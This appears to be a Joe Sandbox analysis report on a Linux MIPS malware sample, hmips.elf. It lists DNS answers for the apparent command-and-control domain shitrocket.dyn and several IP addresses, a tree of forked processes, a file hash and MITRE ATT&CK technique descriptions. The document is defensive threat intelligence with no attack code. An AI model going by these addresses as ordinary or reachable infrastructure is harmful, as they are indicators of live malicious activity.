Dec 21, 2024 04:27:55.185673952 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.245457888 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.245457888 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.245457888 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.245457888 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.245457888 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.245457888 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.245457888 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:00.127276897 CET	51.158.108.203	192.168.2.23	0xcee8	Format error (1)	hikvision.geek. [malformed]	none	none	256	448	false
Dec 21, 2024 04:28:00.375998974 CET	194.36.144.87	192.168.2.23	0xfa80	Format error (1)	catvision.dyn. [malformed]	none	none	256	448	false
Dec 21, 2024 04:28:00.633162022 CET	81.169.136.222	192.168.2.23	0xfbf6	No error (0)	shitrocket.dyn		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:00.633162022 CET	81.169.136.222	192.168.2.23	0xfbf6	No error (0)	shitrocket.dyn		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:00.633162022 CET	81.169.136.222	192.168.2.23	0xfbf6	No error (0)	shitrocket.dyn		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:00.633162022 CET	81.169.136.222	192.168.2.23	0xfbf6	No error (0)	shitrocket.dyn		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:00.633162022 CET	81.169.136.222	192.168.2.23	0xfbf6	No error (0)	shitrocket.dyn		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:00.633162022 CET	81.169.136.222	192.168.2.23	0xfbf6	No error (0)	shitrocket.dyn		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:00.633162022 CET	81.169.136.222	192.168.2.23	0xfbf6	No error (0)	shitrocket.dyn		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.443694115 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.443694115 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.443694115 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.443694115 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.443694115 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.443694115 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.443694115 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.507653952 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.507653952 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.507653952 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.507653952 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.507653952 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.507653952 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.507653952 CET	168.235.111.72	192.168.2.23	0x65bc	No error (0)	shitrocket.dyn		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:07.925062895 CET	81.169.136.222	192.168.2.23	0xb2a0	No error (0)	shitrocket.dyn		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:07.925062895 CET	81.169.136.222	192.168.2.23	0xb2a0	No error (0)	shitrocket.dyn		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:07.925062895 CET	81.169.136.222	192.168.2.23	0xb2a0	No error (0)	shitrocket.dyn		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:07.925062895 CET	81.169.136.222	192.168.2.23	0xb2a0	No error (0)	shitrocket.dyn		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:07.925062895 CET	81.169.136.222	192.168.2.23	0xb2a0	No error (0)	shitrocket.dyn		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:07.925062895 CET	81.169.136.222	192.168.2.23	0xb2a0	No error (0)	shitrocket.dyn		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:07.925062895 CET	81.169.136.222	192.168.2.23	0xb2a0	No error (0)	shitrocket.dyn		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:10.491585016 CET	109.91.184.21	192.168.2.23	0xd70	No error (0)	shitrocket.dyn		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:10.491585016 CET	109.91.184.21	192.168.2.23	0xd70	No error (0)	shitrocket.dyn		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:10.491585016 CET	109.91.184.21	192.168.2.23	0xd70	No error (0)	shitrocket.dyn		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:10.491585016 CET	109.91.184.21	192.168.2.23	0xd70	No error (0)	shitrocket.dyn		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:10.491585016 CET	109.91.184.21	192.168.2.23	0xd70	No error (0)	shitrocket.dyn		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:10.491585016 CET	109.91.184.21	192.168.2.23	0xd70	No error (0)	shitrocket.dyn		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:10.491585016 CET	109.91.184.21	192.168.2.23	0xd70	No error (0)	shitrocket.dyn		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:12.846244097 CET	194.36.144.87	192.168.2.23	0x5232	Format error (1)	hikvision.geek. [malformed]	none	none	256	460	false
Dec 21, 2024 04:28:13.094410896 CET	152.53.15.127	192.168.2.23	0x405a	Format error (1)	catvision.dyn. [malformed]	none	none	256	461	false
Dec 21, 2024 04:28:13.335596085 CET	51.158.108.203	192.168.2.23	0xfee0	Format error (1)	catlovingfools.geek. [malformed]	none	none	256	461	false
Dec 21, 2024 04:28:21.244559050 CET	109.91.184.21	192.168.2.23	0xd70	Format error (1)	catvision.dyn. [malformed]	none	none	256	469	false
Dec 21, 2024 04:28:37.745575905 CET	81.169.136.222	192.168.2.23	0xc7f7	No error (0)	shitrocket.dyn		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:37.745575905 CET	81.169.136.222	192.168.2.23	0xc7f7	No error (0)	shitrocket.dyn		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:37.745575905 CET	81.169.136.222	192.168.2.23	0xc7f7	No error (0)	shitrocket.dyn		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:37.745575905 CET	81.169.136.222	192.168.2.23	0xc7f7	No error (0)	shitrocket.dyn		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:37.745575905 CET	81.169.136.222	192.168.2.23	0xc7f7	No error (0)	shitrocket.dyn		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:37.745575905 CET	81.169.136.222	192.168.2.23	0xc7f7	No error (0)	shitrocket.dyn		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:37.745575905 CET	81.169.136.222	192.168.2.23	0xc7f7	No error (0)	shitrocket.dyn		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:41.340818882 CET	51.158.108.203	192.168.2.23	0xcee8	Format error (1)	hikvision.geek. [malformed]	none	none	256	489	false
Dec 21, 2024 04:28:41.587431908 CET	194.36.144.87	192.168.2.23	0xfa80	Format error (1)	catlovingfools.geek. [malformed]	none	none	256	489	false

System Behavior

Analysis Process: hmips.elf PID: 6240, Parent PID: 6165

General

Start time (UTC):	03:26:54
Start date (UTC):	21/12/2024
Path:	/tmp/hmips.elf
Arguments:	/tmp/hmips.elf
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: hmips.elf PID: 6242, Parent PID: 6240

General

Start time (UTC):	03:26:54
Start date (UTC):	21/12/2024
Path:	/tmp/hmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: hmips.elf PID: 6298, Parent PID: 6242

General

Start time (UTC):	03:26:55
Start date (UTC):	21/12/2024
Path:	/tmp/hmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: hmips.elf PID: 6308, Parent PID: 6298

General

Start time (UTC):	03:26:55
Start date (UTC):	21/12/2024
Path:	/tmp/hmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: hmips.elf PID: 6315, Parent PID: 6308

General

Start time (UTC):	03:26:55
Start date (UTC):	21/12/2024
Path:	/tmp/hmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: hmips.elf PID: 6244, Parent PID: 6240

General

Start time (UTC):	03:26:54
Start date (UTC):	21/12/2024
Path:	/tmp/hmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: hmips.elf PID: 6268, Parent PID: 6244

General

Start time (UTC):	03:26:54
Start date (UTC):	21/12/2024
Path:	/tmp/hmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: hmips.elf PID: 6270, Parent PID: 6268

General

Start time (UTC):	03:26:54
Start date (UTC):	21/12/2024
Path:	/tmp/hmips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report hmips.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: hmips.elf PID: 6240, Parent PID: 6165

General

Analysis Process: hmips.elf PID: 6242, Parent PID: 6240

General

Analysis Process: hmips.elf PID: 6298, Parent PID: 6242

General

Analysis Process: hmips.elf PID: 6308, Parent PID: 6298

General

Analysis Process: hmips.elf PID: 6315, Parent PID: 6308

General

Analysis Process: hmips.elf PID: 6244, Parent PID: 6240

General

Analysis Process: hmips.elf PID: 6268, Parent PID: 6244

General

Analysis Process: hmips.elf PID: 6270, Parent PID: 6268

General

Linux Analysis Report
hmips.elf